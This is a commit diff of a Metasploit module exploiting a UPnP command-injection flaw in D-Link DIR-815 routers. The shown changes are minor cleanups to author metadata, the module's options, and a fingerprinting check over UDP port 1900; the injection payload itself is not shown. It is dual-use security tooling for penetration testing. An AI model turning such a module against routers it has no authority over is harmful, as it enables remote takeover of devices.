@@ -22,13 +22,13 @@ def initialize(info = {})
22
22
'Author' =>
23
23
[
24
24
'Zachary Cutlip' , # Vulnerability discovery and initial exploit
25
- 'Michael Messner <devnull@ s3cur1ty.de>' # Metasploit module and verification on other routers
25
+ 'Michael Messner <devnull[at] s3cur1ty.de>' # Metasploit module and verification on other routers
26
26
] ,
27
27
'License' => MSF_LICENSE ,
28
28
'References' =>
29
29
[
30
- [ 'URL' , 'https://github.com/zcutlip/exploit-poc/tree/master/dlink/dir-815-a1/upnp-command-injection' ] , # original exploit
31
- [ 'URL' , 'http://shadow-file.blogspot.com/2013/02/dlink-dir-815-upnp-command-injection.html' ] # original exploit
30
+ [ 'URL' , 'https://github.com/zcutlip/exploit-poc/tree/master/dlink/dir-815-a1/upnp-command-injection' ] , # original exploit
31
+ [ 'URL' , 'http://shadow-file.blogspot.com/2013/02/dlink-dir-815-upnp-command-injection.html' ] # original exploit
32
32
] ,
33
33
'DisclosureDate' => 'Feb 01 2013' ,
34
34
'Privileged' => true ,
@@ -40,21 +40,23 @@ def initialize(info = {})
40
40
'Arch' => ARCH_MIPSLE
41
41
}
42
42
] ,
43
- [ 'MIPS Big Endian' , # unknown if there are big endian devices out there
43
+ [ 'MIPS Big Endian' , # unknown if there are big endian devices out there
44
44
{
45
45
'Platform' => 'linux' ,
46
46
'Arch' => ARCH_MIPS
47
47
}
48
- ] ,
48
+ ]
49
49
] ,
50
50
'DefaultTarget' => 0
51
51
) )
52
+
52
53
register_options (
53
54
[
54
55
Opt ::RHOST ( ) ,
55
- Opt ::RPORT ( 1900 ) ,
56
+ Opt ::RPORT ( 1900 )
56
57
] , self . class )
57
58
59
+ deregister_options ( 'CMDSTAGER::DECODER' , 'CMDSTAGER::FLAVOR' )
58
60
end
59
61
60
62
def check
@@ -72,8 +74,8 @@ def check
72
74
res = nil
73
75
1 . upto ( 5 ) do
74
76
res , _ , _ = udp_sock . recvfrom ( 65535 , 1.0 )
75
- break if res and res =~ /SERVER:\ Linux,\ UPnP\/ 1.0,\ DIR-...\ Ver/mi
76
- udp_sock . sendto ( msearch , rhost , rport , 0 )
77
+ break if res and res =~ /SERVER:\ Linux,\ UPnP\/ 1\ . 0,\ DIR-...\ Ver/mi
78
+ udp_sock . sendto ( pkt , rhost , rport , 0 )
77
79
end
78
80
79
81
# UPnP response:
0 commit comments